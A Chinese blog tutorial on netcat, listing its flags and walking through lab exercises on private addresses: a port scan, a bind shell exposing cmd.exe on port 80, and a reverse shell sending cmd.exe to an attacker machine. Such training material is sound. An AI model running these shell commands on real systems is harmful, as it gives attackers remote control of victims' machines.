NC的基本使用

NCnetcat的缩写被誉为网络安全界的‘瑞士军刀’通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立起需要的几乎所有类型的网络连接

nc [-options] hostname port[s] [ports] …

序号 代码 作用
01 -d 在后台运行
02 -e prog 程序重定向,一旦连接,就执行绑定的程序(比较危险)
03 -g 源路由跳跃点,不超过八次
04 -G 源路由指示器4,8,12,…
05 -h 帮助信息
06 -i secs 延迟时间设置,端口扫描时使用
07 -l 监听方式,等待连入。连接完成后,结束监听
08 -L 监听方式,等待连入。连接完成后,继续监听
09 -n 以数字形式表示的IP地址
10 -o file 指定要传送的16进制代码
11 -P port 指定本地的端口号
12 -r 随意指定本地0或远程端口号
13 -s addr 本地的源地址
14 -t 以telnet形式应答入站请求
15 -u UDP方式
16 -v 显示详细信息
17 -w 指定超时的时间
18 -z I/O模式,扫描时使用

如:
1.应用了http/1.1 应用了GET方法

  • 将nc命令复制到c盘根下
  • 进入dos模式并退到根下
  • 打入nc -l -p 80:监控80端口的进入情况
  • 输入本机的IP地址或127.0.0.1使用80端口

2.连接80端口

  • 进入dos并退入跟下
  • 打上nc -l -p 80:监控80端口的进入情况
  • 再开启一个dos telnet本机ip 80或127.0.0.1 80查看联动

3.扫描远程主机192.168.0.103的80到445所有端口
的开放情况

格式:nc -nvv -w2 -z 192.168.0.103 80-445
4. 正向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过80端口将攻击机192.168.0.100正向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 被攻击机192.168.0.103上绑定shell到80端口。
格式:nc -vv –l –p 80 –e cmd.exe
步骤2 攻击机192.168.0.100通过80端口连接到主机192.168.0.103并获得远程主机的shell。
格式:nc 192.168.0.103 80
实训5反向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过8080端口从攻击机192.168.0.100上反向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 攻击机192.168.0.100对自己的8080端口进行监控。
格式:nc -vv –l –p 8080
步骤2 被攻击机192.168.0.103将shell绑定到攻击机的8080端口,从而攻击机反向获得被攻击机的shell。
格式:nc –e cmd.exe 192.168.0.100 8080

发布了15 篇原创文章 · 获赞 0 · 访问量 144

猜你喜欢

转载自blog.csdn.net/qq_44230959/article/details/105407718
nc